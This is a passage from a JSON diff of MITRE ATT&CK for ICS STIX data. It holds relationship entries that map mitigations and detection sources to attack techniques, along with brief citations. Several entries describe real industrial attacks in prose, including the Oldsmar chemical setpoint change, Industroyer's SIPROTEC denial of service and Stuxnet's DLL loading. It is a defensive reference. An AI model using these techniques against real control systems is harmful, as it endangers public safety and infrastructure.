Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:48:02.425Z", + "description": "Monitor mail server and proxy logs for evidence of messages originating from spoofed addresses, including records indicating failed DKIM+SPF validation or mismatched message headers.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7d0ec383-4c5d-474d-9262-3f3c0d6c05b1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Ensure devices have an alternative method for communicating in the event that a valid COM port is unavailable.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--df95c619-33ee-4484-934a-78857717323e", + 
"created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:18:47.783Z", + "description": "Monitor for unusual logins to Internet connected devices or unexpected protocols to/from the Internet. Network traffic content will provide valuable context and details about the content of network flows.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5bf8473c-3c60-4a8a-8514-c2b50ab8a92d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 
2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:51:47.079Z", + "description": "Monitor ICS automation protocols for functions that restart or shutdown a device. Commands to restart or shutdown devices may also be observable in traditional IT management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54f6293a-1ccb-4dcb-b85c-9a2a57daddb9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:18:27.480Z", + "description": "Monitor for unexpected protocols to/from the Internet. 
While network traffic content and logon session metadata may directly identify a login event, new Internet-based network flows may also be a reliable indicator of this technique.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f64b5aa-7e4d-4a5e-9960-69a63ad25083", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Execution prevention may prevent malicious scripts from accessing protected resources.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2c641542-2e18-4943-849a-7141b7da4fcd", + "created": "2022-09-20T20:54:36.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 
2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:25:27.955Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors raised the sodium hydroxide setpoint value from 100 part-per-million (ppm) to 11,100 ppm, far beyond normal operating levels.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--39963a04-9675-4fa4-87ea-1b34145cc569", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. 
Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:44.656Z", + "description": "Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe , especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) Consider monitoring for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7dedeb73-ef90-4282-a635-cc37326773af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.083Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. 
(Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "external_references": [ + { + "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014", + "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea218d63-d9de-4f63-804a-cb039d804025", + "created": "2022-09-20T20:54:08.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 
2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:26:30.893Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors gained access to the system through remote access software, allowing for the use of the standard operator HMI interface.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e323dee4-a896-4a82-85f5-d51d311b0437", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Max Heinemeyer February 2020", + "description": "Max Heinemeyer 2020, February 21 Post-mortem of a targeted Sodinokibi ransomware attack Retrieved. 2021/04/12 ", + "url": "https://www.darktrace.com/en/blog/post-mortem-of-a-targeted-sodinokibi-ransomware-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:56.076Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) uses the SMB protocol to encrypt files located on remotely connected file shares. 
(Citation: Max Heinemeyer February 2020)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--42508a8e-44d5-4af1-9e66-bace5fc94734", + "created": "2022-09-27T18:49:25.089Z", + "revoked": false, + "external_references": [ + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:49:25.089Z", + "description": "Monitor for mismatches between protocols and their expected ports (e.g., non-HTTP traffic on tcp:80). 
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--87c8ab74-576d-4962-b641-0762d374d1e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:49:35.368Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SIPROTEC DoS module exploits the CVE-2015-5374 vulnerability in order to render a Siemens SIPROTEC device unresponsive. While the vulnerability does not directly cause the restart or shutdown of the device, the device must be restarted manually before it can resume operations. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5ca1d677-b41f-4f1e-b86b-f5637a418829", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.182Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--66f79019-d52c-46a6-b605-c2335d1d3d20", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:25:59.238Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) has the capability to stop a service itself, or to login as a user and stop a service as that user. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5d33de22-35b0-47fa-bc63-f984522340b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.068Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b4efcbe0-ffe3-4d9a-8dba-570e68494af1", + "created": "2023-03-10T20:10:23.377Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water 
Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:10:23.377Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--43bdf580-b98f-49cf-92d5-3dac50450c86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5a16cecc-4017-4ce8-97db-01cb66a1528e", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ 
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:41.495Z", + "description": "Monitor for API calls that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7ff12adb-bc9a-42e5-9cbf-613b200c36dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.114Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at Pwn2Own hacking contest Retrieved. 
2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--94c903f4-a6c1-40c4-9e9b-0896a5d43b7e", + "created": "2022-09-27T15:48:55.986Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:48:55.986Z", + "description": "Monitor device alarms that indicate controller task parameters have changed, although not all devices produce such alarms.\n \n[Program Download](https://attack.mitre.org/techniques/T0843) may be used to enable this technique. Monitor for program downloads which may be noticeable via operational alarms. Asset management systems should be consulted to understand expected program versions.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b3862aa6-7bd0-46a4-83b6-bb687bb7caa6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Chris Bing May 2018", + "description": "Chris Bing 2018, May 24 Trisis masterminds have expanded operations to target U.S. industrial firms Retrieved. 
2020/01/03 ", + "url": "https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:07:07.445Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilizes watering hole websites to target industrial employees. (Citation: Chris Bing May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a47cd7b9-2b73-480c-a8ab-2dfa908e02ea", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 
2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:20:11.016Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a06c15b-b7e5-4374-9265-8d9020e126cd", + "created": "2021-10-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T17:31:56.055Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) infects DLL's associated with the WinCC Simatic manager which are responsible for opening project files. 
If a user opens an uninfected project file using a compromised manager, the file will be infected with Stuxnet code. If an infected project is opened with the Simatic manager, the modified data file will trigger a search for the `xyz.dll` file. If the `xyz.dll` file is not found in any of the specified locations, the malicious DLL will be loaded and executed by the manager. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:39.703Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). 
